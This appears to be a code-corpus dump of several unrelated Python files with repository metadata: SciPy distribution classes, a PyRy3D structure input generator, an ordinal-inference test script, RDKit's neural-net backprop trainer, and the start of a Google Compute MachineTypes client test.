return 1.0*(x == x)
def _cdf(self, x):
return x
def _ppf(self, q):
return q
def _stats(self):
return 0.5, 1.0/12, 0, -1.2
def _entropy(self):
return 0.0
uniform = uniform_gen(a=0.0, b=1.0, name='uniform')
class vonmises_gen(rv_continuous):
"""A Von Mises continuous random variable.
%(before_notes)s
Notes
-----
If `x` is not in range or `loc` is not in range it assumes they are angles
and converts them to [-pi, pi] equivalents.
The probability density function for `vonmises` is::
vonmises.pdf(x, kappa) = exp(kappa * cos(x)) / (2*pi*I[0](kappa))
for ``-pi <= x <= pi``, ``kappa > 0``.
See Also
--------
vonmises_line : The same distribution, defined on a [-pi, pi] segment
of the real line.
%(example)s
"""
def _rvs(self, kappa):
return self._random_state.vonmises(0.0, kappa, size=self._size)
def _pdf(self, x, kappa):
return exp(kappa * cos(x)) / (2*pi*special.i0(kappa))
def _cdf(self, x, kappa):
return vonmises_cython.von_mises_cdf(kappa, x)
def _stats_skip(self, kappa):
return 0, None, 0, None
vonmises = vonmises_gen(name='vonmises')
vonmises_line = vonmises_gen(a=-np.pi, b=np.pi, name='vonmises_line')
class wald_gen(invgauss_gen):
"""A Wald continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wald` is::
wald.pdf(x) = 1/sqrt(2*pi*x**3) * exp(-(x-1)**2/(2*x))
for ``x > 0``.
`wald` is a special case of `invgauss` with ``mu == 1``.
%(example)s
"""
def _rvs(self):
return self._random_state.wald(1.0, 1.0, size=self._size)
def _pdf(self, x):
return invgauss._pdf(x, 1.0)
def _logpdf(self, x):
return invgauss._logpdf(x, 1.0)
def _cdf(self, x):
return invgauss._cdf(x, 1.0)
def _stats(self):
return 1.0, 1.0, 3.0, 15.0
wald = wald_gen(a=0.0, name="wald")
class wrapcauchy_gen(rv_continuous):
"""A wrapped Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wrapcauchy` is::
wrapcauchy.pdf(x, c) = (1-c**2) / (2*pi*(1+c**2-2*c*cos(x)))
for ``0 <= x <= 2*pi``, ``0 < c < 1``.
%(example)s
"""
def _argcheck(self, c):
return (c > 0) & (c < 1)
def _pdf(self, x, c):
return (1.0-c*c)/(2*pi*(1+c*c-2*c*cos(x)))
def _cdf(self, x, c):
output = 0.0*x
val = (1.0+c)/(1.0-c)
c1 = x < pi
c2 = 1-c1
xp = extract(c1, x)
xn = extract(c2, x)
if (any(xn)):
valn = extract(c2, np.ones_like(x)*val)
xn = 2*pi - xn
yn = tan(xn/2.0)
on = 1.0-1.0/pi*arctan(valn*yn)
place(output, c2, on)
if (any(xp)):
valp = extract(c1, np.ones_like(x)*val)
yp = tan(xp/2.0)
op = 1.0/pi*arctan(valp*yp)
place(output, c1, op)
return output
def _ppf(self, q, c):
val = (1.0-c)/(1.0+c)
rcq = 2*arctan(val*tan(pi*q))
rcmq = 2*pi-2*arctan(val*tan(pi*(1-q)))
return where(q < 1.0/2, rcq, rcmq)
def _entropy(self, c):
return log(2*pi*(1-c*c))
wrapcauchy = wrapcauchy_gen(a=0.0, b=2*pi, name='wrapcauchy')
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_continuous)
__all__ = _distn_names + _distn_gen_names
|
jsilter/scipy
|
scipy/stats/_continuous_distns.py
|
Python
|
bsd-3-clause
| 106,977
|
[
"Gaussian"
] |
7fba641b6a570b962849d69726bc977972117b02faf7c8cc0e2ad6963cfa47d7
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# www.genesilico.pl
#
#creates ranked 3D models of macromoleular complexes
#based on experimental restraints and a whole complex shape.
__author__ = "Joanna M. Kasprzak"
__copyright__ = "Copyright 2010, The PyRy3D Project"
__credits__ = ["Janusz Bujnicki"]
__license__ = "GPL"
__version__ = "0.1.0"
__maintainer__ = "Joanna Kasprzak"
__email__ = "jkasp@amu.edu.pl"
__status__ = "Prototype"
import sys, os, glob, tarfile
from shutil import rmtree
#Internal imports
#BioPython
from Bio import PDB
from Bio.PDB import PDBParser, PDBIO
from Bio.PDB.Atom import Atom
from Bio.PDB.Residue import Residue
from Bio.PDB.Chain import Chain
from Bio.PDB.Model import Model
from Bio.PDB.Structure import Structure
import tkMessageBox
#from Pyry_cleanPDB import run_cleanPDB
RESNAMES = {"ALA": "A", "ARG": "R", "ASP": "D", "ASN": "N", "CYS": "C",\
"GLU": "E", "GLY": "G", "GLN": "Q", "HIS": "H", \
"ILE": "I", "LEU": "L", "LYS": "K", "MET": "M", "MSE": "M",\
"PHE": "F", "PRO": "P", "SER": "S", "THR": "T",\
"TRP": "W", "TYR": "Y", "VAL": "V", \
"CYT": "C", "THY": "T", "GUA": "G", "ADE": "A", "URA": "U"}
"""
This module is created to enable PyRy3D users to create input files automatically
1. it takes a folder with structures
2. it renames chains, renumber residues, remove hetatoms
3. creates tared archive with structures in PyRy3D format
4. automatically creates fasta file with structure sequences
5. automatically creates config file with simulation parameters set into default values
The module will become:
1. a part of PyRy3D program
2. a part of PyRy3D Chimera plugin
Future:
1. features enabling users to decide on parameters for config file
2. features enabling users to decide on numeration/chain_names for structures
"""
class PyRy3D_IG_Error(Exception): pass
class PyRy3D_InputGenerator(object):
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_infiles(self):
pass
def print_run_command(self):
pass
class InStructure(object):
def __init__(self, biostruct, filename):
self.biostruct = biostruct
self.filename = filename
class InStructures(object):
"""
stores information and methods to create default PyRy3D structure folder
"""
def __init__(self):
self.structures = [] #list of Bio.PDB structures provided by the user
self.taken_chains = [] #list of chain names already assigned
self.alphabet = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","W","X","Y","Z",\
"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","w","x","y","z",\
"1","2","3","4","5","6","7","8","9","0","-","+","_","=","~","`","!","@","#","$","%","^","&","*","(",\
")","{","}","[","]","|"]
#here add other chars and digits
self.outname = "" #outfolder name
def __str__(self):
pass
def generate_pyry_instructures(self, input_folder, output_folder, rankname = ""):
"""
"""
self.extract_structures(input_folder)
self.create_outfolder(output_folder)
self.prepare_instructures()
self.archive_structures(rankname)
def prepare_instructures(self):
"""
XXXXXXXXXXXXXXXXXXXXXXXXXXXXx
"""
for struc in self.structures:
chain_name = ""
for model in struc.biostruct:
for chain in model:
chain_name += chain.id
self.clean_structures(chain)
if (chain_name in self.taken_chains) or (chain_name == ""):
self.rename_chains(chain, self.alphabet[0])
self.taken_chains.append(self.alphabet[0])
self.alphabet.pop(0)
elif (chain_name not in self.taken_chains):
self.taken_chains.append(chain_name)
if chain_name in self.alphabet:
self.alphabet.remove(chain_name)
self.write_pdb(struc.biostruct, self.outname+"/"+str(struc.filename))
def create_outfolder(self, outname):
"""
creates outfolder with prepared structures' files
"""
#if os.path.exists(str(outname)) == True:
# rmtree(str(outname))
self.outname = outname
#os.mkdir(str(outname))
def extract_structures(self, infolder):
"""
takes all files from outfolder and stores in self.structures list of objects
"""
#os.system("python cleanPDB.py -q -d "+str(infolder))
#run_cleanPDB(str(filename), self.shape_file)
pdb_files = glob.glob(str(infolder)+'/*.pdb')
#if len(pdb_files) == 0: raise PyRy3D_IG_Error("The files you provided are not pdb files")
for pdbfile in pdb_files:
parser = PDBParser()
structure = parser.get_structure(str(pdbfile), pdbfile)
pdbfile=pdbfile.replace("\\","/")
#print "POREPLACE", pdbfile
filename = pdbfile.split("/")[-1]
#print "DALEJ", filename
struc = InStructure(structure,filename)
if len(list(structure.get_residues())) == 0:
raise PyRy3D_IG_Error("The file you provided for structure %s is not a valid pdb file"%(structure.id))
self.structures.append(struc)
def clean_structures(self, chain):
"""
remove hetatms, ions, ligands etc which are not parsed by Bio.PDB
"""
print "Cleaning", chain.id
for resi in chain:
if resi.id[0] != ' ':
#print "!!!!!!!!", chain.id, resi.id, resi.resname
#if resi.resname == "MSE":
# resi.resname = "MET"
#resi.id[0] = " "
#else:
#print "DETACH", resi.id, resi.resname, chain.id
chain.detach_child(resi.id)
def rename_chains(self, chain, chain_name):
"""
renames chains in structures, as a result each structure has
a different chain name (A, B,......, Z)
"""
#what if more than 24 chains?
chain.id = chain_name
def renumber_residues(self, chain):
"""
renumbers residues from 1 to ...
"""
i = 1
for resi in chain:
resi.id = (' ', i, ' ')
i += 1
#def renumber_residues_start_stop(struct, start_id, stop_id, ren_type = None):
# """
# method for renumbering residues according to user defined order
# """
# i = start_id
# for model in struct:
# for chain in model:
# chain.id = 'P'
# for residue in chain:
# if ren_type != None:
# if residue.id[2] != ' ':
# residue.id = (' ', i, ' ')
# i += 1
# elif i <= stop_id:
# residue.id = (' ', i, ' ')
# i += 1
# return struct
def write_pdb(self, structure, filename):
"""
Writing to the pdb_file, saving changed coordinated
"""
fp=open(filename, "w")
io=PDBIO(1)
io.set_structure(structure)
io.save(fp)
def archive_structures(self,rankname):
"""
creates tar archive with structures - final input for PyRy3D
"""
if rankname != "":
#rankname = "input"
tar = tarfile.open(self.outname+"/packs/"+rankname+".tar", "w:")
tarname=rankname
tar.add(self.outname,arcname=tarname,recursive=False)
files = glob.glob(self.outname+"/*.pdb")
for f in files:
fn = f.split("/")[-1]
tar.add(f,arcname=tarname+"/"+fn)
tar.close()
else:
rankname = "input"
tar = tarfile.open(self.outname+"/"+rankname+".tar", "w:")
#tarname=self.outname.split("/")[-1]
tarname=rankname
tar.add(self.outname,arcname=tarname)
tar.close()
class InSequences(object):
"""
stores information and methods to create default PyRy3D mfasta file
"""
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_insequences(self, fastafile, structures):
"""
create multi fasta file in format:
>A
seq_A
>B
seq_B
Parameters:
-------------
fastafile : output fasta file name
structures : list of all structures as Bio.PDB objects
"""
self.create_fasta_file(fastafile)
self.get_sequences(structures)
def create_fasta_file(self, filename):
if os.path.exists(str(filename)) == True:
os.remove(str(filename))
fh = open(filename, "a")
self.fasta_file = fh
def get_sequences(self, structures):
"""
retrieves struct sequence as one letter code
Parameters:
-----------
structures: all structures from infolder as a list of Bio.PDB objects
"""
for struct in structures:
sequence, chains_names = "", []
for ch in struct.biostruct.get_chains():
chains_names.append(ch.id)
for resi in struct.biostruct.get_residues():
resi_name = ''
resi_name += resi.resname.strip()
#for 3letter residue names like "ALA"
if len(resi_name) == 3:
resi_name = self.get_1letter_resname(resi_name, struct.biostruct, ch)
resi.resname = resi_name
#for dna names like "DC"
elif len(resi_name) == 2:
resi_name = resi_name[1]
resi.resname = resi_name
sequence += resi_name
self.add_sequence(sequence, chains_names)
self.fasta_file.close()
def add_sequence(self, sequence, chains):
"""
adds sequence to fasta file
"""
chains_ids = ";".join(chains)
self.fasta_file.write(">"+str(chains_ids)+"\n")
self.fasta_file.write(sequence+"\n")
def get_1letter_resname(self, resname, struct, chain):
"""
returns 1letter code of given residue eg. A for ALA
Parameters:
-----------
resname : residue name in any notation eg ALA, URI or A, U
struct : structure for which the function works at the moment
Returns:
---------
resname in 1letter notation e.g. A, U
Raises:
--------
PyRy3D_IG_Error : if v.strange residue name appears
"""
if resname in RESNAMES.keys() : return RESNAMES[resname]
else:
#print "There is no residue %s %s"%(resname, chain.id)
return ""
class InConfig(object):
"""
stores information and methods to create default PyRy3D cofig file
"""
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_inconfig(self, filename):
"""
generates config file with all values set into default
"""
self.create_config_file(str(filename))
self.add_default_data()
def create_config_file(self, conffile):
"""
"""
if os.path.exists(str(conffile)) == True:
os.remove(str(conffile))
self.confile = open(conffile, "a")
def add_default_data(self):
"""
"""
content = """
SIMMETHOD x #genetic or sa for simulated annealing (default)
#REDUCTMETHOD roulette #Roulette,Tournament,Cutoff
ANNTEMP 10 #from range X to Y
STEPS 10 #default 100; how many simulation steps to perform?; maximum 1000
MAP_OUT 1 #default 1; can be in range from 0 to 10
BOX_OUT 1 #default 1; can be in range from 0 to 10
MAP_FREE_SPACE 1 #default 1; can be in range from 0 to 10
COLLISION 1 #default 1.5; can be in range from 0 to 10
RESTRAINTS 1 #default 1.3; can be in range from 0 to 10
MAXROT 10 #default is 5
MAXTRANS 10 10 10 #default is [5, 5, 5]
KVOL 1 #kvol default is 10, max is 50; how many complex volumes will describe density map
#THRESHOLD 1.6 #float value existing in map file, default is 0
SIMBOX 1.2 #default simulation box diameter
GRIDRADIUS 1.0 #default is 1.0
GRIDTYPE X
PARAMSCALINGRANGES 0 25 50 #default 0 25 50; at what point of simulation should parameter scaling ranges kick in
PARAMSCALINGR1 50 100 #default 50 100
PARAMSCALINGR2 25 50 #default 25 50
PARAMSCALINGR3 0 25 #default 0 25
WRITE_N_ITER 1 # default 1, minimum 1 max=STRUCT_NR
#OUT_STEPS FIRST LAST #default one struct with best score; which steps in output data?
STRUCT_NR 1 #default 0.1SIMUL_NR; number ot out structure with best scores
"""
self.confile.write(content)
self.confile.close()
def add_user_defined_data(self):
"""
method takes params from the user (from command line) and adds to config file
"""
pass
if __name__=='__main__':
doc = """
PyRy3D_Input_Generator
easy generator of input files for PyRy3D program
(c) 2010 by Joanna M. Kasprzak
usage: python pyry3d.py
"""
print doc
#config = InConfig().generate_pyry_inconfig("config.txt")
instr = InStructures()
instr.generate_pyry_instructures("problems", "problems")
inseq = InSequences().generate_pyry_insequences("problems.fasta", instr.structures)
#print get_pyry_command()
|
mdobrychlop/pyry3d_chimera_extension
|
PyRy3D_input_generator.py
|
Python
|
gpl-3.0
| 14,149
|
[
"Biopython"
] |
7315283642a90f9f259dc884b9a2506db65c960100f0ac662459c101215e18a5
|
"""
Test of ordinalInference
w are generated from N(0,1)
"""
from ordinalInference import *
VERBOSE = False
def testModel(d, n, sigma, true_w, B, useSigma, selfComparisons=False):
global VERBOSE
training_y = np.zeros(n).astype(float)
training_ab = np.zeros((n,2)).astype(int)
num_data_errors = 0.0
for i in range(n):
ai = np.random.randint(d)
bi = np.random.randint(d)
if not selfComparisons:
while ai == bi:
bi = np.random.randint(d)
training_ab[i,0] = ai
training_ab[i,1] = bi
training_y[i] = np.sign((true_w[ai] - true_w[bi]) + np.random.normal(0,sigma))
if training_y[i] == 0:
training_y[i] = 1
if bool(true_w[ai] > true_w[bi]) != bool(training_y[i] == 1):
num_data_errors += 1
if useSigma:
inferred_w = ordinalInferenceGivenSigma(d, training_y, training_ab, B, sigma)
inferred_sigma = sigma
else:
(inferred_w, inferred_sigma) = \
ordinalInference(d, training_y, training_ab, B=B, VERBOSE=VERBOSE)
#print 'FRAC DATA ERRORS: %g' % (num_data_errors/n)
return (np.asarray([n, np.square(np.linalg.norm(true_w - inferred_w, 2))/d]), inferred_w, inferred_sigma)
d = 2
n_vals = np.asarray([1, 2, 4, 8, 16, 32, 64]) * d
sigma = 2 # Gaussian noise stddev
ntrials = 10
selfComparisons = False
true_w = np.random.normal(size=(d))
true_w -= np.sum(true_w) / d
true_B = np.max(np.fabs(true_w))
print 'True w: %s' % str(true_w)
print 'Testing with true sigma = %g...\n' % sigma
print '\nResults'
if d <= 10:
wstr = '\tAvg w'
else:
wstr = ''
print 'n\tL2error/n' + wstr
for n in n_vals:
L2error = 0.0
avg_w = np.zeros(d)
for trial in range(ntrials):
(r_, w_, s_) = testModel(d, n, sigma, true_w, B=true_B,
useSigma=True,
selfComparisons=selfComparisons)
L2error += r_[1]
avg_w += w_
L2error /= ntrials
avg_w /= ntrials
if d <= 10:
wstr = '\t' + str(avg_w)
print '%d\t%g%s' % (n, L2error, wstr)
print ''
#raise Exception()
print 'Testing choosing sigma using CV...\n'
print '\nResults'
if d <= 10:
wstr = '\tAvg sigma\tAvg w'
else:
wstr = ''
print 'n\tL2error/n' + wstr
for n in n_vals:
if n < 8:
continue # too small to do crossval
L2error = 0.0
avg_w = np.zeros(d)
avg_sigma = 0
for trial in range(ntrials):
(r_, w_, s_) = testModel(d, n, sigma, true_w, B=true_B, useSigma=False)
L2error += r_[1]
avg_w += w_
avg_sigma += s_
L2error /= ntrials
avg_w /= ntrials
avg_sigma /= ntrials
if d <= 10:
wstr = '\t' + str(avg_sigma) + '\t' + str(avg_w)
print '%d\t%g%s' % (n, L2error, wstr)
print ''
|
jkbradley/peergrade
|
cardinalVSordinal/ordinalInference_test.py
|
Python
|
apache-2.0
| 2,809
|
[
"Gaussian"
] |
8a63d6552d177ba2a904bd7f48d7195f228e68cc19ffed770bd884ade8534153
|
#
# Copyright (C) 2000-2008 greg Landrum
#
""" Training algorithms for feed-forward neural nets
Unless noted otherwise, algorithms and notation are taken from:
"Artificial Neural Networks: Theory and Applications",
Dan W. Patterson, Prentice Hall, 1996
"""
import numpy
class Trainer(object):
""" "virtual base class" for network trainers
"""
pass
class BackProp(Trainer):
"""implement back propagation (algorithm on pp 153-154 of Patterson)
I don't *think* that I've made any assumptions about the connectivity of
the net (i.e. full connectivity between layers is not required).
**NOTE:** this code is currently making the assumption that the activation
functions on the nodes in the network are capable of calculating their
derivatives using only their values (i.e. a DerivFromVal method should
exist). This shouldn't be too hard to change.
"""
def StepUpdate(self, example, net, resVect=None):
""" does a BackProp step based upon the example
**Arguments**
- example: a 2-tuple:
1) a list of variable values values
2) a list of result values (targets)
- net: a _Network_ (or something supporting the same API)
- resVect: if this is nonzero, then the network is not required to
classify the _example_
**Returns**
the backprop error from _network_ **before the update**
**Note**
In case it wasn't blindingly obvious, the weights in _network_ are modified
in the course of taking a backprop step.
"""
totNumNodes = net.GetNumNodes()
if self.oldDeltaW is None:
self.oldDeltaW = numpy.zeros(totNumNodes, numpy.float64)
outputNodeList = net.GetOutputNodeList()
nOutput = len(outputNodeList)
targetVect = numpy.array(example[-nOutput:], numpy.float64)
trainVect = example[:-nOutput]
if resVect is None:
# classify the example
net.ClassifyExample(trainVect)
resVect = net.GetLastOutputs()
outputs = numpy.take(resVect, outputNodeList)
errVect = targetVect - outputs
delta = numpy.zeros(totNumNodes, numpy.float64)
# start with the output layer
for i in range(len(outputNodeList)):
idx = outputNodeList[i]
node = net.GetNode(idx)
# the deltas here are easy
delta[idx] = errVect[i] * node.actFunc.DerivFromVal(resVect[idx])
# use these results to start working on the deltas of the preceding layer
inputs = node.GetInputs()
weights = delta[idx] * node.GetWeights()
for j in range(len(inputs)):
idx2 = inputs[j]
delta[idx2] = delta[idx2] + weights[j]
# now propagate the deltas backwards
for layer in range(net.GetNumHidden() - 1, -1, -1):
nodesInLayer = net.GetHiddenLayerNodeList(layer)
for idx in nodesInLayer:
node = net.GetNode(idx)
# start by finishing off the error term for this guy
delta[idx] = delta[idx] * node.actFunc.DerivFromVal(resVect[idx])
# and then propagate our errors to the preceding layer
if layer != 0:
inputs = node.GetInputs()
weights = delta[idx] * node.GetWeights()
for i in range(len(inputs)):
idx2 = inputs[i]
delta[idx2] = delta[idx2] + weights[i]
# okey dokey... we've now got the deltas for each node, use those
# to update the weights (whew!)
nHidden = net.GetNumHidden()
for layer in range(0, nHidden + 1):
if layer == nHidden:
idxList = net.GetOutputNodeList()
else:
idxList = net.GetHiddenLayerNodeList(layer)
for idx in idxList:
node = net.GetNode(idx)
dW = self.speed * delta[idx] * numpy.take(resVect, node.GetInputs())
newWeights = node.GetWeights() + dW
node.SetWeights(newWeights)
# return the RMS error from the OLD network
return numpy.sqrt(errVect * errVect)[0]
def TrainOnLine(self, examples, net, maxIts=5000, errTol=0.1, useAvgErr=1, silent=0):
""" carries out online training of a neural net
The definition of online training is that the network is updated after
each example is presented.
**Arguments**
- examples: a list of 2-tuple:
1) a list of variable values values
2) a list of result values (targets)
- net: a _Network_ (or something supporting the same API)
- maxIts: the maximum number of *training epochs* (see below for definition) to be
run
- errTol: the tolerance for convergence
- useAvgErr: if this toggle is nonzero, then the error at each step will be
divided by the number of training examples for the purposes of checking
convergence.
- silent: controls the amount of visual noise produced as this runs.
**Note**
a *training epoch* is one complete pass through all the training examples
"""
nExamples = len(examples)
converged = 0
cycle = 0
while (not converged) and (cycle < maxIts):
maxErr = 0
newErr = 0
# print('bp: ',cycle)
for example in examples:
localErr = self.StepUpdate(example, net)
newErr += localErr
if localErr > maxErr:
maxErr = localErr
if useAvgErr == 1:
newErr = newErr / nExamples
else:
newErr = maxErr
# print('\t',newErr,errTol)
if newErr <= errTol:
converged = 1
# if cycle % 10 == 0 and not silent:
if not silent:
print('epoch %d, error: % 6.4f' % (cycle, newErr))
cycle = cycle + 1
if not silent:
if converged:
print('Converged after %d epochs.' % cycle)
else:
print('NOT Converged after %d epochs.' % cycle)
print('final error: % 6.4f' % newErr)
def __init__(self, speed=0.5, momentum=0.7):
""" Constructor
**Arguments**
- speed: the speed parameter for back prop training
- momentum: the momentum term for back prop training
*Not currently used*
"""
self.speed = speed
self.momentum = momentum
self.oldDeltaW = None
if __name__ == '__main__': # pragma: nocover
from rdkit.ML.Neural import Network
def testAnd():
examples = [[[0, 0, 1], [0.1]], [[0, 1, 1], [.1]], [[1, 0, 1], [.1]], [[1, 1, 1], [.9]]]
net = Network.Network([3, 1])
t = BackProp()
t.TrainOnLine(examples, net)
return net
def testOr():
examples = [[[0, 0, 1], [0.1]], [[0, 1, 1], [.9]], [[1, 0, 1], [.9]], [[1, 1, 1], [.9]]]
net = Network.Network([3, 1])
t = BackProp()
t.TrainOnLine(examples, net, maxIts=1000, useAvgErr=0)
print('classifications:')
for example in examples:
res = net.ClassifyExample(example[0])
print('%f -> %f' % (example[1][0], res))
return net
def testXor():
examples = [[[0, 0, 1], [.1]], [[0, 1, 1], [.9]], [[1, 0, 1], [.9]], [[1, 1, 1], [.1]]]
net = Network.Network([3, 3, 1])
t = BackProp(speed=.8)
t.TrainOnLine(examples, net, errTol=0.2)
return net
def testLinear():
examples = [
[.1, .1],
[.2, .2],
[.3, .3],
[.4, .4],
[.8, .8],
]
net = Network.Network([1, 2, 1])
t = BackProp(speed=.8)
t.TrainOnLine(examples, net, errTol=0.1, useAvgErr=0)
print('classifications:')
for example in examples:
res = net.ClassifyExample(example[:-1])
print('%f -> %f' % (example[-1], res))
return net
def runProfile(command):
import random
random.seed(23)
import profile
import pstats
datFile = '%s.prof.dat' % (command)
profile.run('%s()' % command, datFile)
stats = pstats.Stats(datFile)
stats.strip_dirs()
stats.sort_stats('time').print_stats()
if 0:
net = testXor()
print('Xor:', net)
import pickle
outF = open('xornet.pkl', 'wb+')
pickle.dump(net, outF)
outF.close()
else:
# runProfile('testLinear')
net = testLinear()
# net = testOr()
|
ptosco/rdkit
|
rdkit/ML/Neural/Trainers.py
|
Python
|
bsd-3-clause
| 7,994
|
[
"RDKit"
] |
0704b9617a658f0e6aa6e507cd21218a17f4c8765cd46d2804dba0cf3b23400a
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
from collections.abc import Iterable
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.machine_types import MachineTypesClient
from google.cloud.compute_v1.services.machine_types import pagers
from google.cloud.compute_v1.services.machine_types import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert MachineTypesClient._get_default_mtls_endpoint(None) is None
assert (
MachineTypesClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert MachineTypesClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class,transport_name", [(MachineTypesClient, "rest"),])
def test_machine_types_client_from_service_account_info(client_class, transport_name):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info, transport=transport_name)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
@pytest.mark.parametrize(
"transport_class,transport_name", [(transports.MachineTypesRestTransport, "rest"),]
)
def test_machine_types_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class,transport_name", [(MachineTypesClient, "rest"),])
def test_machine_types_client_from_service_account_file(client_class, transport_name):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
def test_machine_types_client_get_transport_class():
transport = MachineTypesClient.get_transport_class()
available_transports = [
transports.MachineTypesRestTransport,
]
assert transport in available_transports
transport = MachineTypesClient.get_transport_class("rest")
assert transport == transports.MachineTypesRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest"),],
)
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
def test_machine_types_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(MachineTypesClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(MachineTypesClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
